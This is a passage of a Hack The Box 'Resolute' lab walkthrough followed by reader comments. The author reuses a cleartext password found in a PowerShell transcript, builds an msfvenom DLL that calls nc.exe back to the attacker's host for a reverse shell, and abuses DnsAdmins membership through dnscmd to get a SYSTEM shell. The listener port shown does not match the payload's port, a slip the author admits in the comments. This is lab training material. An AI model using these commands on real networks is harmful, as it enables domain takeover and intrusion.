MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:" cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** *Evil-WinRM* PS C:\PSTranscripts\20191203> |
The transcript is a jackpot for me, I found a lot of useful information including user Rayn (probably a System Administrator), link to backups, system files location etc.
I’m going to use EvilWinRM again to login as Ryan.
I’m in the system as Ryan.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
⚡ ⚙ root@ns09~/htb/resolute ruby evil-winrm.rb -i resolute.htb -u ryan -p Serv3r4Admin4cc123! Evil-WinRM shell v1.8 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> dir Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 12/10/2019 8:36 AM 1261 checks.txt -a---- 12/10/2019 8:24 AM 1228692 jaws.out -a---- 12/10/2019 5:16 AM 16975 JAWS.ps1 -a---- 11/10/2019 8:45 AM 13766 Powerless.bat -a---- 12/10/2019 8:21 AM 34939 powerless.out -a---- 12/10/2019 5:36 AM 562842 PowerUp.ps1 -a---- 12/9/2019 4:54 PM 278934 ryan.dll *Evil-WinRM* PS C:\Users\ryan\Documents> |
Let us see what Ryan has access to:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami megabank\ryan *Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 *Evil-WinRM* PS C:\Users\ryan\Documents> |
So the enumeration of the groups shows the user Ryan belongs to the MEGABANK\DnsAdmins group, so we can run some queries as Administrator using our current user Ryan.
A DNSAdmin is a full privileged Administrator of a server. We can run any commands or tasks as Administrator if the user has DNSAdmin group membership.
So we can create an executable file like nc.exe or a
CREATE A MALICIOUS PAYLOAD
|
1 2 3 4 5 6 |
⚡ root@ns09~/htb/resolute msfvenom -p windows/x64/exec cmd='\\10.10.14.21\resolute\nc.exe 10.10.14.21 4444 -e cmd.exe' -f dll >nav1n.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 325 bytes Final size of dll file: 5120 bytes |
RUN AN SMB SHARE
|
1 2 3 4 5 6 7 8 9 10 |
⚡ root@ns09~/htb/resolute smbserver.py -smb2support resolute /root/htb/resolute/ Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed |
START THE LISTENER
|
1 2 3 4 5 |
⚡ ⚙ root@ns09 ~/htb/resolute nc -nvlp 80 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 |
RUN DNS COMMAND (from Resolute)
The DNSCommand in Windows is for managing DNS servers. This utility is useful in scripting batch files to help automate routine DNS management tasks or to perform simple unattended setup and configuration of new DNS servers on a network. Ref
Here I’m going to use the "dnscmd resolute /config /serverlevelplugindll \10.10.14.21\resolute\nav1n.dll"modifies the registry of ServerPluginDLL property with our code.
The second and third command sc.exe \resolute stop dns and sc.exe \resolute start dns stops and starts the DNS server. When DNS server restarts our custom modified code in the ServerlevelPluginDLL executes the command, my listener will get a reverse shell as System.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute /config /serverlevelplugindll \\10.10.14.21\resolute\nav1n.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x7530 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 76 FLAGS : *Evil-WinRM* PS C:\Users\ryan\Documents> |
REVERSE CONNECTION AS SYSTEM
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
⚡ ⚙ root@ns09~/htb/resolute nc -nvlp 80 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from 10.10.10.169. Ncat: Connection from 10.10.10.169:53610. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>cd / cd / C:\>cd users cd users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is 923F-3611 Directory of C:\Users 12/04/2019 02:46 AM <DIR> . 12/04/2019 02:46 AM <DIR> .. 09/25/2019 09:43 AM <DIR> Administrator 12/04/2019 02:46 AM <DIR> melanie 11/20/2016 06:39 PM <DIR> Public 09/27/2019 06:05 AM <DIR> ryan 0 File(s) 0 bytes 6 Dir(s) 30,956,904,448 bytes free C:\Users>cd Administrator cd Administrator C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 923F-3611 Directory of C:\Users\Administrator\Desktop 12/04/2019 05:18 AM <DIR> . 12/04/2019 05:18 AM <DIR> .. 12/03/2019 07:32 AM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 30,956,904,448 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt e1d94[------------]405e619c C:\Users\Administrator\Desktop> |
Thank you for reading, hope you enjoyed it.
Interesting to see how you went about the DNS priv esc. I didn’t think of doing it that way. I just wrote a legit DNS plugin DLL that had my own code in it to read the flag from the admin desktop and write it out to a file I could read from Powershell. I thought if the DLL was not a legit DNS plugin with exports like DnsPluginInitialize then it is meant to stop the DNS Server service from starting, so I’m surprised your method worked. Maybe I’m misunderstanding and you did do that as well. PS you’re not… Read more »
Thanks a lot, @vbscrub. And I agree that the terms I used aren’t correct, I just corrected it 🙂
@VbScrub, just read your Resolute writeup. I must appreciate the stuff you carried using PowerShell and Windows7 (really????) which I never thought is possible. Hoping to own a box someday using your method. Thanks 🙂
[…] Hack The Box Resolute Writeup – 10.10.10.169 […]
Hey
When you started the listener, port should be 4444, same one the venom is calling back, no?
I rooted the easy way, with a psexec with metasploit.
Yes it supposed to be the same, In my article I used the different port in the listener, probably I change the port in the malicious payload and didn’t take the screenshot.
This might be a really out of the topic question but what terminal is that. Kinda making me curious haha.
Hello, Its one of the themes for OhMyZsh shell. You can find out mere here: https://github.com/ohmyzsh/ohmyzsh, https://github.com/ohmyzsh/ohmyzsh/wiki/External-themes and https://github.com/ohmyzsh/ohmyzsh/wiki/Themes
When you restart the DC you need to type command like “sc.exe stop dns”.
Why the FQDN of this DC is “resolute” not “resolute.megabank.local”?
I’m really confused about that. Please tell me.
Hello, the ServiceControl (sc.exe) you are running on the local machine (resolute) so no need to run full FQDN. However, as per MS, to run sc.exe you don’t even mention the server name.
For remotely running, the server name must be Universal Naming Convention (UNC) format (for example, \\myserver)
Ref: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-config